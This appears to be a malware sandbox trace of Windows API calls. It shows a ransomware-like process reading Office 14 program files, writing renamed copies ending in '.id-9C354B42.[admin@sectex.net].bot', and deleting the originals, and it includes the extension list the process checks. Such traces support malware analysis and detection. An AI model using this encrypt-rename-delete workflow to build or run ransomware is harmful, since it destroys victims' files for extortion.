	[0169.067] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0169.068] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.271] CloseHandle (hObject=0x1d8) returned 1
	[0169.271] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.271] SetEndOfFile (hFile=0x3f0) returned 1
	[0169.821] CloseHandle (hObject=0x3f0) returned 1
	[0169.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.888] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng")) returned 1
	[0169.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.889] lstrlenW (lpString=".doc") returned 4
	[0169.889] lstrcmpiW (lpString1=".doc", lpString2=".LNG") returned -1
	[0169.889] lstrlenW (lpString=".docx") returned 5
	[0169.889] lstrcmpiW (lpString1=".docx", lpString2="H.LNG") returned -1
	[0169.889] lstrlenW (lpString=".pdf") returned 4
	[0169.889] lstrcmpiW (lpString1=".pdf", lpString2=".LNG") returned 1
	[0169.889] lstrlenW (lpString=".xls") returned 4
	[0169.889] lstrcmpiW (lpString1=".xls", lpString2=".LNG") returned 1
	[0169.889] lstrlenW (lpString=".xlsx") returned 5
	[0169.889] lstrcmpiW (lpString1=".xlsx", lpString2="H.LNG") returned -1
	[0169.889] lstrlenW (lpString=".ppt") returned 4
	[0169.889] lstrcmpiW (lpString1=".ppt", lpString2=".LNG") returned 1
	[0169.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.889] lstrlenW (lpString=".zip") returned 4
	[0169.889] lstrcmpiW (lpString1=".zip", lpString2=".LNG") returned 1
	[0169.889] lstrlenW (lpString=".rar") returned 4
	[0169.889] lstrcmpiW (lpString1=".rar", lpString2=".LNG") returned 1
	[0169.889] lstrlenW (lpString=".bz2") returned 4
	[0169.889] lstrcmpiW (lpString1=".bz2", lpString2=".LNG") returned -1
	[0169.889] lstrlenW (lpString=".7z") returned 3
	[0169.889] lstrcmpiW (lpString1=".7z", lpString2="LNG") returned -1
	[0169.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.889] lstrlenW (lpString=".dbf") returned 4
	[0169.889] lstrcmpiW (lpString1=".dbf", lpString2=".LNG") returned -1
	[0169.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.889] lstrlenW (lpString=".1cd") returned 4
	[0169.889] lstrcmpiW (lpString1=".1cd", lpString2=".LNG") returned -1
	[0169.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.889] lstrlenW (lpString=".jpg") returned 4
	[0169.889] lstrcmpiW (lpString1=".jpg", lpString2=".LNG") returned -1
	[0169.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.890] lstrlenW (lpString=".doc") returned 4
	[0169.890] lstrcmpiW (lpString1=".doc", lpString2=".LNG") returned -1
	[0169.890] lstrlenW (lpString=".docx") returned 5
	[0169.890] lstrcmpiW (lpString1=".docx", lpString2="H.LNG") returned -1
	[0169.890] lstrlenW (lpString=".pdf") returned 4
	[0169.890] lstrcmpiW (lpString1=".pdf", lpString2=".LNG") returned 1
	[0169.890] lstrlenW (lpString=".xls") returned 4
	[0169.890] lstrcmpiW (lpString1=".xls", lpString2=".LNG") returned 1
	[0169.890] lstrlenW (lpString=".xlsx") returned 5
	[0169.890] lstrcmpiW (lpString1=".xlsx", lpString2="H.LNG") returned -1
	[0169.890] lstrlenW (lpString=".ppt") returned 4
	[0169.890] lstrcmpiW (lpString1=".ppt", lpString2=".LNG") returned 1
	[0169.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.890] lstrlenW (lpString=".zip") returned 4
	[0169.890] lstrcmpiW (lpString1=".zip", lpString2=".LNG") returned 1
	[0169.890] lstrlenW (lpString=".rar") returned 4
	[0169.890] lstrcmpiW (lpString1=".rar", lpString2=".LNG") returned 1
	[0169.890] lstrlenW (lpString=".bz2") returned 4
	[0169.890] lstrcmpiW (lpString1=".bz2", lpString2=".LNG") returned -1
	[0169.890] lstrlenW (lpString=".7z") returned 3
	[0169.890] lstrcmpiW (lpString1=".7z", lpString2="LNG") returned -1
	[0169.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.890] lstrlenW (lpString=".dbf") returned 4
	[0169.890] lstrcmpiW (lpString1=".dbf", lpString2=".LNG") returned -1
	[0169.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.890] lstrlenW (lpString=".1cd") returned 4
	[0169.890] lstrcmpiW (lpString1=".1cd", lpString2=".LNG") returned -1
	[0169.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG") returned 53
	[0169.890] lstrlenW (lpString=".jpg") returned 4
	[0169.890] lstrcmpiW (lpString1=".jpg", lpString2=".LNG") returned -1
	[0169.891] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.891] lstrlenW (lpString="Hardware Tracker.fdt") returned 20
	[0169.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0169.891] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=133955) returned 1
	[0169.891] CloseHandle (hObject=0x3f0) returned 1
	[0169.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt")) returned 0x20
	[0169.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0169.892] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.892] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.913] GetLastError () returned 0x0
	[0169.913] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x20b43, lpOverlapped=0x0) returned 1
	[0169.968] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x20b50, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x20b50, lpOverlapped=0x0) returned 1
	[0169.971] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.971] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0169.971] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.971] CloseHandle (hObject=0x1d8) returned 1
	[0169.971] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.971] SetEndOfFile (hFile=0x3f0) returned 1
	[0169.977] CloseHandle (hObject=0x3f0) returned 1
	[0169.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.979] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt")) returned 1
	[0169.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.985] lstrlenW (lpString=".doc") returned 4
	[0169.985] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0169.985] lstrlenW (lpString=".docx") returned 5
	[0169.985] lstrcmpiW (lpString1=".docx", lpString2="r.fdt") returned -1
	[0169.985] lstrlenW (lpString=".pdf") returned 4
	[0169.985] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0169.985] lstrlenW (lpString=".xls") returned 4
	[0169.985] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0169.985] lstrlenW (lpString=".xlsx") returned 5
	[0169.985] lstrcmpiW (lpString1=".xlsx", lpString2="r.fdt") returned -1
	[0169.986] lstrlenW (lpString=".ppt") returned 4
	[0169.986] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0169.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.986] lstrlenW (lpString=".zip") returned 4
	[0169.986] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0169.986] lstrlenW (lpString=".rar") returned 4
	[0169.986] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0169.986] lstrlenW (lpString=".bz2") returned 4
	[0169.986] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0169.986] lstrlenW (lpString=".7z") returned 3
	[0169.986] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0169.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.986] lstrlenW (lpString=".dbf") returned 4
	[0169.986] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0169.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.986] lstrlenW (lpString=".1cd") returned 4
	[0169.986] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0169.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.986] lstrlenW (lpString=".jpg") returned 4
	[0169.986] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0169.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.986] lstrlenW (lpString=".doc") returned 4
	[0169.986] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0169.986] lstrlenW (lpString=".docx") returned 5
	[0169.986] lstrcmpiW (lpString1=".docx", lpString2="r.fdt") returned -1
	[0169.986] lstrlenW (lpString=".pdf") returned 4
	[0169.986] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0169.986] lstrlenW (lpString=".xls") returned 4
	[0169.986] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0169.986] lstrlenW (lpString=".xlsx") returned 5
	[0169.986] lstrcmpiW (lpString1=".xlsx", lpString2="r.fdt") returned -1
	[0169.987] lstrlenW (lpString=".ppt") returned 4
	[0169.987] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0169.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.987] lstrlenW (lpString=".zip") returned 4
	[0169.987] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0169.987] lstrlenW (lpString=".rar") returned 4
	[0169.987] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0169.987] lstrlenW (lpString=".bz2") returned 4
	[0169.987] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0169.987] lstrlenW (lpString=".7z") returned 3
	[0169.987] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0169.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.987] lstrlenW (lpString=".dbf") returned 4
	[0169.987] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0169.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.987] lstrlenW (lpString=".1cd") returned 4
	[0169.987] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0169.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt") returned 117
	[0169.987] lstrlenW (lpString=".jpg") returned 4
	[0169.987] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0169.987] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.987] lstrlenW (lpString="Track Issues.fdt") returned 16
	[0169.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0169.988] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=124518) returned 1
	[0169.988] CloseHandle (hObject=0x188) returned 1
	[0169.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt")) returned 0x20
	[0169.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0169.988] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.988] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0169.993] GetLastError () returned 0x0
	[0169.993] ReadFile (in: hFile=0x188, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x1e666, lpOverlapped=0x0) returned 1
	[0170.025] WriteFile (in: hFile=0x350, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1e670, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1e670, lpOverlapped=0x0) returned 1
	[0170.028] ReadFile (in: hFile=0x188, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.028] WriteFile (in: hFile=0x350, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0170.028] SetEndOfFile (hFile=0x350) returned 1
	[0170.402] CloseHandle (hObject=0x350) returned 1
	[0170.402] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.402] SetEndOfFile (hFile=0x188) returned 1
	[0170.549] CloseHandle (hObject=0x188) returned 1
	[0170.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.550] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt")) returned 1
	[0170.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.550] lstrlenW (lpString=".doc") returned 4
	[0170.550] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.550] lstrlenW (lpString=".docx") returned 5
	[0170.550] lstrcmpiW (lpString1=".docx", lpString2="s.fdt") returned -1
	[0170.550] lstrlenW (lpString=".pdf") returned 4
	[0170.551] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString=".xls") returned 4
	[0170.551] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString=".xlsx") returned 5
	[0170.551] lstrcmpiW (lpString1=".xlsx", lpString2="s.fdt") returned -1
	[0170.551] lstrlenW (lpString=".ppt") returned 4
	[0170.551] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.551] lstrlenW (lpString=".zip") returned 4
	[0170.551] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString=".rar") returned 4
	[0170.551] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString=".bz2") returned 4
	[0170.551] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.551] lstrlenW (lpString=".7z") returned 3
	[0170.551] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.551] lstrlenW (lpString=".dbf") returned 4
	[0170.551] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.551] lstrlenW (lpString=".1cd") returned 4
	[0170.551] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.551] lstrlenW (lpString=".jpg") returned 4
	[0170.551] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.551] lstrlenW (lpString=".doc") returned 4
	[0170.551] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.551] lstrlenW (lpString=".docx") returned 5
	[0170.551] lstrcmpiW (lpString1=".docx", lpString2="s.fdt") returned -1
	[0170.551] lstrlenW (lpString=".pdf") returned 4
	[0170.551] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.551] lstrlenW (lpString=".xls") returned 4
	[0170.552] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.552] lstrlenW (lpString=".xlsx") returned 5
	[0170.552] lstrcmpiW (lpString1=".xlsx", lpString2="s.fdt") returned -1
	[0170.552] lstrlenW (lpString=".ppt") returned 4
	[0170.552] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.552] lstrlenW (lpString=".zip") returned 4
	[0170.552] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.552] lstrlenW (lpString=".rar") returned 4
	[0170.552] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.552] lstrlenW (lpString=".bz2") returned 4
	[0170.552] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.552] lstrlenW (lpString=".7z") returned 3
	[0170.552] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.552] lstrlenW (lpString=".dbf") returned 4
	[0170.552] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.552] lstrlenW (lpString=".1cd") returned 4
	[0170.552] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt") returned 113
	[0170.552] lstrlenW (lpString=".jpg") returned 4
	[0170.552] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.552] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.552] lstrlenW (lpString="VIEW.ICO") returned 8
	[0170.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0170.553] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=318) returned 1
	[0170.553] CloseHandle (hObject=0x188) returned 1
	[0170.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico")) returned 0x20
	[0170.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
